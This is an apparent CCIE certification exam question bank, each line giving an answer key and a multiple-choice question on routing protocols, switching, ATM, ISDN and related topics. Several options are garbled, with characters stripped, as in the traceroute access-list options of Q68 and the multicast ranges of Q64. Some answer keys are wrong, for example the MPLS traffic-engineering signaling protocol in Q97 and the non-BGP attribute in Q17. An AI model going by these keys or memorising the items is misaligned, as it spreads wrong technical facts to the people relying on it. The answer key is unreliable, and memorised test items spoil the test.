B	#CCIE Q1 Load sharing of VLAN traffic over parallel ISL trunks is:^A. Not possible due to the nature of ISL.^B. Configurable on a per VLAN basis.^C. Configurable on a per packet basis.^D. Automatic due to the nature of ISL and its interaction with the IEEE Spanning Tree protocol.
D	#CCIE Q2 What does the EIGRP Feasibility Condition mean?^A. The FD must be unique.^B. The FD must be higher than zero.^C. The FD must be equal to RD.^D. The RD must be lower than FD.^E. None of the above.
A	#CCIE Q3 A network administrator is running OSPF demand circuit across an ISDN link. What statement is correct?^A. The calling router must be network type point-to-point.^B. OSPF demand circuit requires network type non-broadcast.^C. OSPF demand circuit will not trigger the link if an OSPF interface goes down.^D. OSPF demand circuit will bring up the link if the topology of the network changes.
C	#CCIE Q4 In a PIMv2 Sparse Mode network, the incoming interface for a (*, G) mroute entry is calculated using:^A. The address of the source.^B. The address of the PIM neighbor that sent the PIM (*, G) Join message.^C. The address of a directly connected member of group G.^D. The address of the currently active Rendezvous Point for group G.^E. The address of the Mapping Agent.
A	#CCIE Q6 Assume a Catalyst 6500 with a Supervisor IA with a MSFC. The MSFC has lost its boot image and the device is now in Rommon.^  What method will work to load c6msfcbin?^A. Xmodem^B. FTP^C. TFTP^D. SNMP
A	#CCIE Q8 What statement is FALSE with respect to the operation of Unidirectional Link Detection?^A. It negotiates the Unidirectional Link Detection link state during physical signaling.^B. It performs tasks that autonegotiation cannot perform.^C. It works by exchanging protocol packets between the neighboring devices.^D. Both devices on the link must support Unidirectional Link Detection and have it enabled on respective ports.
B	#CCIE Q10 What is true concerning Traffic contract, Traffic shaping, and Traffic policing in ATM networks?^A. They are parameters of PNNI set during PNNI configuration.^B. They are forms of QoS features used in ATM networks.^C. They are types of SVCs.^D. They are types of PVCs.^E. They are only used between ATM switches to control traffic flows.
E	#CCIE Q12 Which are the primary reasons to use traffic shaping?^A. To control the maximum rate of traffic transmitted or received on an interface.^B. To control access to available bandwidth.^C. To define Layer 3 aggregate or granular incoming or outgoing bandwidth rate limits.^D. To control the average queue size by indicating to the end hosts when they should temporarily slow down transmission of packets.^E. To ensure that traffic conforms to the policies established for it.
D	#CCIE Q13 In a bridged network running IEEE 802.1d spanning tree, what parameter will a bridge take from the root bridge?^A. Maxage^B. Forwarding delay^C. Hello time^D. All of the above
B	#CCIE Q14 What statement is FALSE concerning the use of SPAN on the Catalyst 6500?^A. It is possible to configure SPAN to have a Gigabit port, such as source port, and a 10/100 port as the destination port.^B. If the source port is configured as a trunk port, the traffic on the destination port will be tagged as well, regardless of the configuration on the destination port.^C. When a SPAN session is active the destination port does not participate in Spanning Tree.^D. With SPAN an entire VLAN can be configured to be the source.^E. In one SPAN session it is possible to monitor multiple ports that do not belong to the same VLAN.
A	#CCIE Q16 What command switches a SONET APS protected circuit over the back-up circuit?^A. aps force atm circuit-.number^B. aps manual circuit-number^C. redundancy force-failover^D. aps backnumber^E. aps force circuit-number
E	#CCIE Q17 What is NOT a BGP attribute?^A. Origin^B. Weight^C. Local_pref^D. Community^E. Cluster_list
A	#CCIE Q18 According to the IEEE 802.11b Wireless LAN specification, what sub-field is NOT part of the Frame Control Field?^A. Duration^B. Power Management^C. Wired Equivalent Privacy^D. More Fragments^E. Order
B	#CCIE Q19 A switch has been configured to support MultiLayer Switching (MLS). ^  In addition, Access Control Lists on the MLS-Route Processor have been configured to block all FTP traffic destined to the Internet.^  What flow mask will be used to create each shortcut?^A. Application flow mask.^B. Full flow mask.^C. Destination^D. Destination flow mask.
E	#CCIE Q21 What feature is provided by IOS NAT (Network Address Translation)?^A. Dynamic network address translation using a pool of IP addresses, or port address translation using a single IP address.^B. Destination based address translation using either route map or extended access-list.^C. Dynamic translation for DNS A and PTR queries.^D. Inside and outside source static network translation that allows overlapping network address spaces on the inside and the outside.^E. All of the above.
A,B	#CCIE Q22 Which statements about FTP are true?^A. FTP always uses two separate TCP sessions - one for control and one for data.^B. With passive mode FTP, both the control and data TCP sessions are initiated from the client.^C. With active mode FTP, the server used the PORT command to tell the client on which port it wished to send the data.^D. For both active and passive mode FTP, the control session on the server always uses TCP port 21, and the data session always uses TCP port 20.
B	#CCIE Q23 A network administrator wants an IP static route to point to a backup link, but only if the same route is not available via a dynamic routing protocol.^  How would this be accomplished?^A. Create a static route with a lower administrative distance than the dynamic protocol.^B. Create a static route with a higher administrative distance than the dynamic protocol.^C. Create a static route with a lower metric than the dynamic protocol.^D. Create a static route with the floating-static keyword.
C	#CCIE Q24 In Token Ring networks, Layer 3 IP Multicast addresses are mapped into Layer 2 Token Ring MAC addresses in which ways?^A. All IP Multicast addresses are mapped to broadcast MAC address FFFF.FFFF.FFFF.^B. All IP Multicast addresses are mapped to Functional Address C000.0000.0001.^C. All IP Multicast addresses are mapped to Functional Address C000.0004.0000.^D. All IP Multicast addresses are mapped to MAC addresses using the same method as is used in Ethernet networks.^E. Configure the Ring Parameter server to set the I/G address to 1.
A	#CCIE Q25 Considering the length of the netmask of a route, the administrative distance and the metric, what comes first when the router performs a route lookup in order to decide which interface to forward a packet out of?^A. The length of the netmask of a route.^B. The administrative distance.^C. The metric.^D. None of the above.
A	#CCIE Q28 What trunk mode combination would not produce an operational ISL trunk?^A. Local: auto Remote: auto^B. Local: on Remote: auto^C. Local: nonegotiate Remote: nonegotiate^D. Local: nonegotiate Remote: on^E. Local: auto Remote: desirable
B	#CCIE Q30 A network administrator wants to advertise the network 135.30.0/27 to an EBGP peer. ^  What command would be used to accomplish this?^A. network 135.30.45.0 255.255.0.0^B. network 135.30.45.0 mask 255.255.255.224^C. network 135.30.45.0^D. network 135.45.0.0
C	#CCIE Q32 What is the maximum one-way latency allowed by the ITU that is acceptable for the majority of voice applications?^A. 15 milliseconds^B. 30 milliseconds^C. 150 milliseconds^D. 300 milliseconds^E. 1.5 seconds
B	#CCIE Q33 For ATM Switched Virtual Circuits to work correctly, what is required?^A. ARP server.^B. Signalling and ILMI PVCs.^C. QoS type set to CBR+.^D. All of the above.
C	#CCIE Q34 MPLS traffic engineering routing information is carried by:^A. BGP MEDs^B. MP-BGP^C. OSPF Opaque LSAs or IS-IS TLVs^D. RTP or RTCP packets
A	#CCIE Q35 What type of EIGRP packets carry the Init flag embedded?^A. Hello^B. Update^C. Query^D. Reply^E. Ack
A	#CCIE Q36 An AT&T 5ESS NI1 switch uses what terminal type of ISDN?^A. Terminal type A.^B. Terminal type B.^C. Terminal type C.^D. Terminal type D.^E. All of the above.
A,C,E	#CCIE Q38 Which are common problems that cause clocking problems on a serial line?^A. Several cables connected together in a row.^B. Too much db gain on the serial line.^C. Incorrect CSU configuration.^D. Impedance mismatch.^E. Incorrect DSU configuration.
B	#CCIE Q39 There is a point-to-point ISDN link between Routers A and B. Router A must be able to dial Router B, but Router B must NOT be able to dial Router A. What will accomplish this?^A. Use an IP access-group command on the interface.^B. Remove the dial string from Router B.^C. Use the no-dial keyword on the interface.^D. Use the same IP address on both sides of the link.
C	#CCIE Q41 Considering OSPF where a binding between an interface and an area has been done, what is the effect of defining such an interface as passive?^A. OSPF will not form any adjacency out of that interface but it will accept the routing updates from the neighbors.^B. OSPF will form all the available adjacencies out of that interface but it won't install any of the learned routes in the local routing table.^C. OSPF will not form any adjacency out of that interface.^D. OSPF will behave as a passive adjacency at the requests coming from neighbors, lying out of the interface, ignoring all the incoming requests.^E. None of the above.
C	#CCIE Q42 With respect to the ATM Reference Model what is NOT one of the ATM layers?^A. Physical layer.^B. ATM adaptation layer (AAL).^C. Generic Flow Control (GFC) layer.^D. ATM layer.
A	#CCIE Q44 What statement is TRUE regarding VLAN Trunk Protocol (VTP) pruning?^A. VTP pruning only affects traffic from VLANs that are pruning eligible.^B. VLAN 1 is always pruning eligible.^C. Pruning eligibility is determined by the amount of ports assigned to a VLAN.^D. VTP pruning is a way to detect the removal of a VLAN within a VTP domain.
C	#CCIE Q45 Routers A, B, and C are running IGRP over frame relay connections. ^  No subinterfaces are used, and a single IP subnet is used for all the Frame Relay interfaces. ^  Router A is able to see routers from both Router B and Router C, but Router B and Router C cannot see routers from each other.^  Which could be causing this problem?^A. Router A is missing frame maps.^B. Router B and Router C are missing frame maps.^C. Split-horizon is enabled on Router A.^D. Split-horizon is disabled on Router A.
A	#CCIE Q46 What is the goal of the ISIS CSNP and the PSNP packets?^A. PSNP are used either to acknowledge the receipt or to request the retransmission of the latest version of an LSP while the CSNP are used for synchronizing the LS Database of adjacent neighbors.^B. CSNP are used either to acknowledge the receipt or to request the retransmission of the latest version of an LSP while the PSNP are used for synchronizing the LS Database of adjacent neighbors.^C. PSNP are used to acknowledge the receipt of the latest version of an LSP while the CSNP are used either for synchronizing the LS Database of adjacent neighbors or to request the retransmission of an LSP.^D. CSNP are used to acknowledge the receipt of the latest version of an LSP while the PSNP are used either for synchronizing the LS Database of adjacent neighbors or to request the retransmission of an LSP.
B,C	#CCIE Q47 Suppose a network access server (NAS) is configured to use TACACS+ to provide user authentication service for remote access users. ^  The NAS gets an ERROR in response to its authentication request when:^A. The TACACS+ service is not running on the server.^B. The supplied user password is incorrect.^C. The username does not exist in the TACACS+ user database.^D. The NAS TACACS+ server key does not match that on the server.^E. The TACACS+ server is unreachable by the NAS.
B,D	#CCIE Q48 Routers 1, 2, 3, and 4 are all connected to a hub via Ethernet interfaces. ^  All routers have a basic OSPF configuration of a network statement for the Ethernet network.^  show ip ospf neighbor on Router 2 shows 2WAY/DROTHER for its neighbor, Router 3.^  Which conclusions can we draw from this?^A. R2 is the DR or BDR.^B. R3 is not a DR or BDR.^C. R2-R3 adjacency is not FULL yet as the only possible conclusion.^D. R2 is not the DR.^E. R4 is the DR.
D	#CCIE Q49 A new Catalyst switch is in a lab. ^  It is decided that a download of the latest supervisor image is needed, so the switch is connected to the corporate Catalyst switch in the lab through the supervisor gigabit ports that are both in VLAN 100 with a single fiber pair. ^  VLAN 100 only existed on the two supervisor ports used and only one router existed in that VLAN. ^  Shortly thereafter thousands of complaints are received that users cannot connect to anything on the network. ^  What command should have been issued on the lab switch prior to connecting to the corporate switch to prevent this problem?^A. Clear cam dynamic.^B. Set spantree uplinkfast enable 1/1.^C. Set trunk 1/1 desirable isl.^D. Set vtp mode transparent.^E. Set port broadcast 1/1 25% unicast enable.
C	#CCIE Q50 The configured passwords for a Catalyst 5000 switch have been lost. The switch will use a known password for the first 30 seconds after boot. What is the password?^A. cisco^B. Cisco^C. Enter key^D. Ctrlx^E. SanFran
C	#CCIE Q51 A company has deployed a new e-commerce web farm. ^  They are using teamed servers that use multicast to maintain a heartbeat between redundant pairs. All servers are in the 192.168.202.0/24 network. ^  For increased security, they require each pair of servers be allowed to see multicast/broadcast traffic from their default gateway and from each other. ^  No pair of servers should ever see any broadcast/multicast traffic from any other pair of servers. ^  Which is the best mechanism for the server ports to accomplish this?^A. Isolated Ports.^B. Promiscuous Ports.^C. Community Ports.^D. Teamed Ports.^E. Span Ports.
B	#CCIE Q52 Which EIGRP packets are sent using a reliable mechanism?^A. Hello^B. Update^C. Query^D. Reply^E. Ack
A,B,C	#CCIE Q53 Which protocols do not need to have their own router ID reachable by other routers to have proper network connectivity?^A. OSPF^B. BGP^C. EIGRP^D. LDP^E. TDP
B,C	#CCIE Q55 Transparent bridges forward, flood, or drop frames based upon entries in the bridge table which may be dynamically added to or removed from the table. ^  Which statements are TRUE regarding bridge table entries?^A. Bridge table entries are learned by examining the destination MAC address of each frame.^B. Bridge table entries are learned by examining the source MAC address of each frame.^C. Increasing the bridge table aging time would result in a reduction of flooding.^D. Decreasing the bridge table aging time would result in a reduction of flooding.^E. It is important to ensure that the aging time is less than the aggregate time to detect and recalculate the spanning tree.
E	#CCIE Q56 Which events cause the EIGRP neighbor relationship to be restarted?^A. Issuing the clear ip route command.^B. Receiving an update packet with Init flag set from a known, already established neighbor relationship.^C. Receiving an update packet from an unknown neighbor.^D. Clearing the IP cache.^E. Clearing the IP EIGRP neighbor relationship.
D	#CCIE Q57 What protocol is NOT part of the Signaling System No. 7?^A. ISUP^B. TCAP^C. MTP^D. SIP^E. SCCP
A,C	#CCIE Q58 By entering the IOS global configuration command aaa new-model, which authentication protocols will be disabled?^A. TACACS^B. TACACS+^C. Extended TACACS (XTACACS)^D. Radius^E. Kerberos
B	#CCIE Q59 The IEEE 802.5 standard defines the specifications for token ring networks. ^  The standard uses a centralized ring maintenance mechanism called active monitor that oversees the ring. ^  What is NOT a responsibility of the active monitor?^A. Checking for lost tokens.^B. Locating breaks in the ring.^C. Removing continuously circulating frames resulting from a failed sending device from the ring.^D. Cleaning up the ring when garbled frames appear.^E. Inserting delay bits to the ring if it is not big enough for the token to circulate.
C	#CCIE Q60 The LAPD protocol is formally specified in:^A. ITU-T T.30^B. ITU-T T.261^C. ITU-T Q.920^D. ITU31^E. ITU931
C	#CCIE Q62 What flag in the TCP header tells the receiver to pass all the data to the receiving application upon arrival?^A. ACK^B. SYN^C. PSH^D. URG^E. RST
A	#CCIE Q63 Routers A and B are running BGP in the same Autonomous System. ^  Routers from Router B show up in the BGP table of Router A, but not in the routing table of Router A as BGP routes. What might cause this?^A. Synchronization is on but Router A is not receiving the same routes via an internal protocol.^B. Synchronization is off but Router A is not receiving the same routes via an internal protocol.^C. Synchronization is off but the BGP peers are down.^D. Nextself is disabled on Router A.
D	#CCIE Q64 Like the reserved Private IP address ranges (RFC 1918), there is also a list of Class D reserved Multicast addresses (RFC 1700). ^  Select the correct answer that matches RFC 1700.^A. 224.0.0.0 - 224.255.255.255^B. 225.0.0.0 - 225.255.255.255^C. 232.0.0.0 - 232.255.255.255^D. 239.0.0.0  239255^E. All of the above.
C	#CCIE Q67 Which is the protocol that On-Demand Routing relies on?^A. IP^B. TCP^C. CDP^D. UDP^E. PPP
B	#CCIE Q68 Traceroute does not work on Host A (a Unix workstation) to the Internet. ^  Currently, there is an inbound access-list 101 permit tcp any any. ^  What access-list entry may need to be added in order to get traceroute to work?^A. access-list 101 permit udp any any^B. accessexceededaccessunreachable^C. accessexceededaccessunreachable^D. access-list 101 permit icmp any any echoaccessunreachable^E. access-list 101 permit udp any anyaccessunreachable
E	#CCIE Q71 The BGP backdoor command:^A. Changes the distance of an iBGP route to 20.^B. Changes the distance of an eBGP route to 200.^C. Changes the distance of an IGRP route to 200.^D. Changes the distance of an IGP route to 20.^E. Does not change the distance of the route.
D	#CCIE Q73 What is not a valid DNS resource record?^A. MX^B. PTR^C. A^D. FQDN^E. NS
D	#CCIE Q74 router ospf 1^  redistribute igrp 20 metric 50 subnets^  What is the effect of the subnets keyword in the above configuration?^A. It forces IGRP to support VLSM in this context.^B. It causes OSPF to recognize classful networks.^C. It has no effect, IGRP always summarizes on class boundaries anyway.^D. It causes OSPF to accept networks with non-classful masks.
B,C,D,E	#CCIE Q75 Which four features does RIP version 2 provide, which were impossible with RIP version 1? (Choose four)^A. Poison reverse and classless routing.^B. Classless routing and split-horizon.^C. Poison reverse and updates to multicast address.^D. Classless routing and updates to multicast address.^E. Route tag and classless routing.
D	#CCIE Q77 What is true about Custom Queuing?^A. Custom queuing will always empty a queue before proceeding to the next queue.^B. Custom queuing can be used to restrict a particular type of traffic to a given bandwidth regardless of the load on that link.^C. Custom queuing looks at groups of packets from the same source-destination pair.^D. Custom queuing can prevent one type of traffic from dominating a busy link.
B	#CCIE Q78 What ISDN reference point network boundary does not have an ITU-T standard?^A. S/T^B. U^C. R^D. S^E. T
A	#CCIE Q79 Which statements are true concerning distance vector and link state routing protocols?^A. Distance vector protocols have a finite limit of hop counts whereas link state protocols do not have a limit on the number of hops for a route.^B. Distance vector protocols have better convergence than link state protocols.^C. RIP is a distance vector protocol whereas RIP version 2 and OSPF are link state protocols.^D. Distance vector protocols only send updates to neighboring routers whereas link state protocols flood updates to all routers within the same routing domain.^E. Both distance vector and link state protocols will take link bandwidth and delays into account when calculating routes.
D	#CCIE Q80 What security service is NOT provided by IPSec?^A. Data confidentiality.^B. Data integrity.^C. Data origin authentication.^D. Protection for multicast/broadcast traffic.^E. Anti-replay.
E	#CCIE Q81 When configuring IPSec on IOS routers, what is a valid ISAKMP policy parameter?^A. SA lifetime.^B. Encryption algorithm.^C. Hash algorithm.^D. Authentication method.^E. All of the above.
B	#CCIE Q83 Policing on a Fast Ethernet interface has been configured using Committed Access Rate (CAR) to allow for extended burst. ^  Traffic has been bursty and a packet arrives on the interface that causes the compounded debt to be greater than the extended burst. What statement is FALSE?^A. The packet is dropped.^B. A token is removed from the token bucket.^C. The compounded debt value is effectively set to zero (0).^D. The packet is not buffered by the CAR process.
B	#CCIE Q84 When connecting two different VLAN Trunk Protocol domains together via an ISL trunk, the switches fail to form the trunk automatically. ^  What is the likely cause?^A. The trunks need to be set to on or nonegotiate.^B. The VTP domain names carried in the Dynamic Inter-Switch Link (DISL) messages are not the same.^C. The Unidirectional Link Detection timers are shorter than the Spanning Tree Protocol (STP) timers.^D. The native VLANs are the same.^E. The VLAN Trunk Protocol multicast address was set to 01
C	#CCIE Q88 What is the first task required in password recovery on a Catalyst 5000 series switch?^A. Set the configuration register to ignore the startup configuration.^B. Set the boot register to 0x2142.^C. Power cycle the switch.^D. Reload the switch using the reload command.
A	#CCIE Q89 Exhibit: In the MPLS network shown, how many routing tables are on Router TK1?^A. 1^B. 2^C. 3^D. 4^E. 5
A,B	#CCIE Q90 Which statements are FALSE concerning the use of VACLs on the Catalyst 6500 switch? (Choose two)^A. VACLs can be used to forward/drop and redirect traffic based on Layer 2 and Layer 3 information.^B. VACLs cannot be used when using QoS on the switch.^C. VACLs can be used together with RACLs.^D. VACLs can be used for traffic that is being L3 switched.^E. VACLs do not cause extra latency for traffic passing through the switch.
A	#CCIE Q92 According to the IEEE 802.5 Token Ring specification, which field is an optional component?^A. RI - Routing Information^B. FC - Frame Control^C. FCS - Frame Check Sequence^D. EFS - End of Frame Sequence^E. AC - Access Control
C	#CCIE Q94 What is the purpose of the clock source command used in IOS T1/E1 interface command mode, and what is the default setting?^A. Routers are DTEs and NEVER supply clock to T1/E1 line.^B. clock source identifies the stratum level associated with the router T1/E1 and the default is Stratum 1.^C. clock source chooses a source for the interface to clock outbound data. The default is clock source line: specifies that the T1/E1 link uses the recovered clock from the line.^D. clock source chooses a source for the interface to clock buffered data. The default is clock source loop-timed: specifies that the T1/E1 interface takes the clock from the Tx (line) and uses it for Rx.
A	#CCIE Q96 In Frame Relay traffic shaping, the bc and be parameters are expressed as:^A. Bits per second.^B. Bits per interval.^C. Bytes per second.^D. Bytes per interval.
B	#CCIE Q97 What signaling protocol does Cisco use to provide support for MPLS traffic engineering?^A. RSVP^B. LDP^C. SS7^D. TDP
B,D,E	#CCIE Q98 This inbound ACL is configured on the router:^  access-list 101 permit tcp any host 209.165.201.10 eq telnet^  access-list 101 deny ip any any^  Which types of packets will be permitted through the router?^A. A non-fragment packet going to the server on port 21.^B. A non-initial fragment packet going to the server on port 23.^C. A non-fragment going to another host that's not 229.165.201.10.^D. A non-initial fragment packet going to the server on port 21.^E. An initial fragment packet going to the server on port 23.
B,E	#CCIE Q99 Which two are correct framing types for a T1 data line? (Choose two)^A. B8ZS^B. SF^C. EMI^D. AMI^E. ESF
E	#CCIE Q101 Which are LANE Components that are used to logically establish a LANE network?^A. LECS, redundant LECS, and BUS.^B. SSRP, UNI, NNI and LEC.^C. ILMI, AAL5, LANE and SSCOP.^D. BUS, LES, LEC and VCC.^E. LECS, LES, and BUS.
A	#CCIE Q106 Using a sniffer, it is verified that a Router is receiving a specific SAP but the server is not showing up in the server table. ^  Which are possible reasons?^A. The Router doesn't know how to get to the IPX network advertised in the SAP packet.^B. The SAP table already contains a similar entry with a different SAP type.^C. There is an Access-list configured to filter out this SAP type.^D. The router only runs NLSP.^E. The server only runs NLSP.
D	#CCIE Q108 ISDN TE2 includes:^A. Devices that manage switching functions.^B. Devices that use the standard ISDN interface.^C. The boundary between the carrier's ISDN network and the CPE.^D. Devices that do not use the standard ISDN interface.^E. None of the above.
E	#CCIE Q109 To what IP address does RIPv2 send its own routing update packets?^A. 224.0.0.10^B. 255.255.255.255^C. 224.0.0.13^D. 224.0.0.5^E. 224.0.0.9
E	#CCIE Q110 How does a router behave in relation to an EIGRP stub neighbor?^A. It will send only default-routes toward stub EIGRP neighbors.^B. It will send only summary routes toward stub EIGRP neighbors.^C. It will not query the stub EIGRP neighbor about any internal route.^D. It will not query the stub EIGRP neighbor about any external route.^E. It will not query the stub EIGRP neighbor about any route.
E	#CCIE Q111 An interface has been configured for custom queuing. Bandwidth has been allocated for three flows A, B and C with average packet sizes of 1000 bytes, 500 bytes and 250 bytes respectively. ^  If flow A has been configured to allow one packet per servicing of its queue, how many packets need to be allowed for flow C in order to achieve a ratio of 20:50:30 for flows A, B and C respectively?^A. 1^B. 2^C. 3^D. 4^E. 5^F. 6
D	#CCIE Q112 What effect do these configuration commands have?^  line vty 0 4^  no login^  password cisco^A. The VTY password is cisco.^B. The login password is login^C. The VTY password is required but not set.^D. No password is required for VTY access.
A	#CCIE Q113 Multicast addresses in the range of 239.0.0.0 through 239.255.255.255 are reserved for:^A. Administratively Scoped multicast traffic that is intended to remain inside of a private network and is never intended to be transmitted into the Internet.^B. Global Internet multicast traffic intended to travel throughout the Internet.^C. Link-local multicast traffic consisting of network control messages that never leave the local subnet.^D. Any valid multicast data stream.
D	#CCIE Q114 What is the tiebreaker used by ISIS to elect the Designated IS on a LAN in a case where all the neighbors have the same priority?^A. The lowest MAC address.^B. The highest router-ID.^C. The lowest router-ID.^D. The highest SNPA.^E. The lowest system-ID.
B,C	#CCIE Q115 When using a sniffer directly connected to an access switch, the sniffer sees an excessive amount of BPDUs with the TCA bit set.^  Which are the most likely explanations?^A. There is no problem in the network.^B. Ports connecting 2 workstations do not have spanning tree portfast configured.^C. Bad cabling is being used in the network.^D. The CPU utilization on the root switch is getting up to 99% and thus is not sending any BPDUs.
C	#CCIE Q116 A network administrator is using a private IP address space for the network with NAT to allow the users to reach the Internet. ^  However, there is a web server on the internal network that must have incoming access from the Internet. What will be required to accomplish this?^A. Put the web server's internal IP address in the external DNS records.^B. Use a dynamic mapping with the reverse keyword.^C. There must be a static NAT mapping for the web server's address.^D. Dynamic NAT will take care of this automatically.
B	#CCIE Q118 When doing an IPX ping from a Cisco router to a Novell server there is no response. What is a possible cause?^A. Novell Servers never respond to IPX pings. This only works between Cisco Routers.^B. Cisco IPX Pings are being sent to a Novell Server.^C. There is no IPX network configured on Loopback 0.^D. The IPX server table doesn't contain the correct SAP entry.^E. All of the above.
B	#CCIE Q120 What is not a transfer mode supported by HDLC?^A. ARM^B. ARB^C. ABM^D. NRM^E. LAPB
D	#CCIE Q122 According to the IEEE 802.2 Logical Link Control specification, the maximum transmit value for LLC flow control is:^A. 15^B. 127^C. 255^D. 1023^E. 4095
B	#CCIE Q123 The interface command Router(config-if)# invert txclock is used for what purpose?^A. It switches TXD and RXD to correct mis-wired cables.^B. It corrects systems that use long cables that experience high error rates when operating at the higher transmission speeds.^C. It configures the serial interface to monitor the DSR signal as the line up/down indicator.^D. It is used to correct situations where it is possible to send back-to-back data packets over serial interfaces faster than some hosts can receive them.
D	#CCIE Q124 It is suspected that packets are being lost on a link between one of your routers and the switch. ^  This connection is configured to be Full Duplex 100Mb Ethernet. To diagnose what is going on on this link, a Fast Ethernet Hub is connected in between the Router and the Switch and an excessive number of alignment errors, CRC errors and Late Collisions are seen.^  What statement is true?^A. Either the Router or the Switch is broken. Looking at sniffer traces, the Source MAC address of the error frames will determine what device it is.^B. These errors are not causing a performance problem.^C. The cabling is bad and thus needs to be replaced.^D. Adding the Hub in between might have caused the errors seen on the link.
E	#CCIE Q125 ^  Current configuration:^  version 12.0^  service timestamps debug uptime^  service timestamps log update^  no service password-encryption^  hostname Simon^  enable secret 5 $1$XV53$hqb0Ra7gwpky0cmL4u3EW0^  enable password cisco^  Given the configuration shown above, what should you type to gain enable access on router Simon?^A. cisco^B. Simon^C. 4u3EW0^D. $1$XV53$hqb0Ra7gwpky0cmL4u3EW0^E. Cannot tell
B	#CCIE Q126 What statement is true concerning Multilayer Switching?^A. The first packet in every flow will be forwarded by the MLS Switching Engine.^B. The first packet in every flow will be forwarded by the MLS Route Processor.^C. Every 10th packet in every flow will be redirected to the MLS Route Processor.^D. Every 100th packet in every flow will be forwarded by the MLS Route Processor.^E. All traffic will be forwarded by the MLS Switching Engine.
B	#CCIE Q128 Which layers in the OSI reference model are missing from the TCP/IP reference model?^A. Network^B. Presentation^C. Transport^D. Session^E. Data link
A,C,E	#CCIE Q129 A router running OSPF, that is being connected to Area 0 and Area 1, is configured with area 1 nssadefaultoriginate. Which are false?^A. The router will inject a type 3 default route into area 1.^B. The router will inject a type 7 default route into area 1.^C. The router will inject a type 5 default route into area 1.^D. The router needs a default route in its routing table to inject a default into area 1.^E. The router does not need a default route in its routing table to inject a default into area 1.
E	#CCIE Q131 How many LSPs does a non-pseudonode ISIS router originate?^A. 1 per link.^B. 1 per link and 1 per external route.^C. Always a minimum of 3.^D. 1, but 2 if there are external routes redistributed into ISIS on this router.^E. Always 1.
C	#CCIE Q132 Packets need to be sent, arriving via DLSW+ on Router A to a host on an Ethernet attached to Router A. ^  Bridging is enabled on the Ethernet but packets are not reaching the host. What is most likely the problem?^A. SRTLB should be run between the source route Virtual Ring and the Ethernet.^B. The DLSW+ peer cost doesn't match the Ethernet bridge group.^C. The DLSW+ bridge-group command is missing.^D. The bridge-group number on the Ethernet is too high.
B	#CCIE Q133 A company has 2 border routers running BGP to 2 different ISPs. ^  They want to control which pathinbound traffic takes without the use of communities. ^  What is the most important consideration?^A. Metric^B. MED^C. AS-path prepending^D. Weight^E. Local preference
B	#CCIE Q135 What statement is TRUE regarding Fast Ethernet Channel?^A. Ports within a Fast Ether Channel do not have to be the same speed and duplex.^B. Port Aggregation Protocol (PAGP) facilitates the automatic creation of Fast Ether channels links.^C. Fast Ethernet Channels can not be configured as a trunk.^D. Ports within a Fast Ether Channels can not be configured as a trunk.^E. Ports within a Fast Ether Channel can be assigned to multiple VLANs.
A	#CCIE Q136 What is NOT true about IRB?^A. IRB allows the same protocol to be bridged and routed through the same physical interface.^B. IRB allows the same protocol to be bridged and routed on the same router.^C. IRB uses a virtual interface to connect bridge and routed interfaces.^D. IRB can support multiple protocols on the same router.
B	#CCIE Q137 When using an LX/LH Gbic, what is the maximum supported cable length when using a Single Mode Fiber with a 8.3/9/19 micron Core?^A. 1504 ft (500 m)^B. 6.2 miles (10 km)^C. 3.1 miles (5 km)^D. 4.6 miles (7.5 km)^E. This type of fiber is not supported with an LX/LH gbic.
D	#CCIE Q138 A network administrator wants a filter that only allows IPX network numbers between BB100 and BB1FF (inclusive). What access list will accomplish this?^A. access-list 805 permit range BB100 BB1FF^B. access-list 850 permit any BB100.0000.0000.0000 B1FF.FFFF.FFFF.FFFF^C. access-list 920 permit any BB100.0000.0000.0000 FF.FFFF.FFFF.FFFF^D. None of the above.
C	#CCIE Q139 What command in interface configuration mode would you use to enable RSVP?^A. ip rsvp sender^B. ip rsvp enable^C. ip rsvp bandwidth^D. ip rsvp reservation^E. RSVP is enabled in global configuration mode, not in interface configuration mode.
E	#CCIE Q140 After adding a new switch to the network it is determined that it is not automatically learning the VLANs via VTP. ^  What is most likely the cause?^A. The other switch is a VTP client.^B. The VTP server has not sent out a periodic VTP advertisement.^C. There are not yet users on the new switch.^D. The native VLAN on the trunk is VLAN 60.^E. The VTP domain name is misconfigured.
B	#CCIE Q141 The log of 7500 with a FDDI interface is showing this message about twice a day:^  %CBUSBADTXEOFVEC: Fddi0/0 ustatus: bad txEof vec^  It is learned from the TAC that this message is indicative that the interface has aborted the transmit due to a claim frame coming in to the interface while the interface was transmitting. ^  The FDDI ring contains some very important web servers and workstations for upper management.^  What action should be taken?^A. The TAC should be contacted and a case should be logged, as this is indicative of a major problem on the FDDI ring.^B. Claim Frames are a normal occurrence, so no action should be taken.^C. A sniffer should be placed on the ring to find the cause of the claims.^D. The FDDI concentrator should be replaced, and all FDDI cables checked.^E. The FDDI Interface should be replaced.
A	#CCIE Q142 A large number of these messages are seen on a Catalyst console:^  %MLSMOVEOVERFLOW:Too many moves, stop MLS for 5 sec(20000000)^  %MLSRESUMESC:Resume MLS after detecting too many moves^  What is the least likely cause?^A. Transitory Spanning Tree loop^B. Unidirectional Fiber Link^C. Faulty Switch Port^D. Pinnacle Sync Failure
D	#CCIE Q144 Which statement concerning the difference between TACACS+ and RADIUS is NOT true?^A. TACACS+ uses UDP while RADIUS uses TCP for transport.^B. RADIUS only encrypts the password field of the packet while TACACS+ encrypts the entire body of the packet.^C. RADIUS is an IETF standard, while TACACS+ is not.^D. TACACS+ sends a separate request for authorization, while RADIUS uses the same request for authentication and authorization.
A	#CCIE Q145 A legacy ISDN configuration connects, but EIGRP is not sending updates across the link. What could be causing this?^A. The dialer-list is blocking EIGRP.^B. The encapsulation is different on both sides of the link.^C. There is a network type mismatch.^D. The broadcast keyword is missing from the dialer-map.
A	#CCIE Q146 What LSA type does the area range command act on?^A. Type 1 and 2.^B. Type 3 and 5.^C. Type 4.^D. Type 1, 2 and 3.^E. Type 4 and 5.
D	#CCIE Q148 Which LSAs run inside a stub OSPF area?^A. Type 1.^B. Type 1 and 3.^C. Type 1 and 2.^D. Type 1, 2 and 3.^E. Type 3 and 5.
A	#CCIE Q149 A port on a FDDI concentrator keeps getting disabled after a few hours and the port has to be manually re-enabled. Which are possible causes?^A. The link quality is bad.^B. Someone keeps disabling this port.^C. Claims frames are seen on the Ring.^D. There are too many late collisions.^E. IBM Spanning Tree has been enabled on the Concentrator.
C	#CCIE Q151 Is MTU part of the metric calculation of an EIGRP route?^A. No, never.^B. Yes, always.^C. Only if the appropriate K-value is activated.^D. Only the smallest MTU of any links along the path is used with the metric calculation.
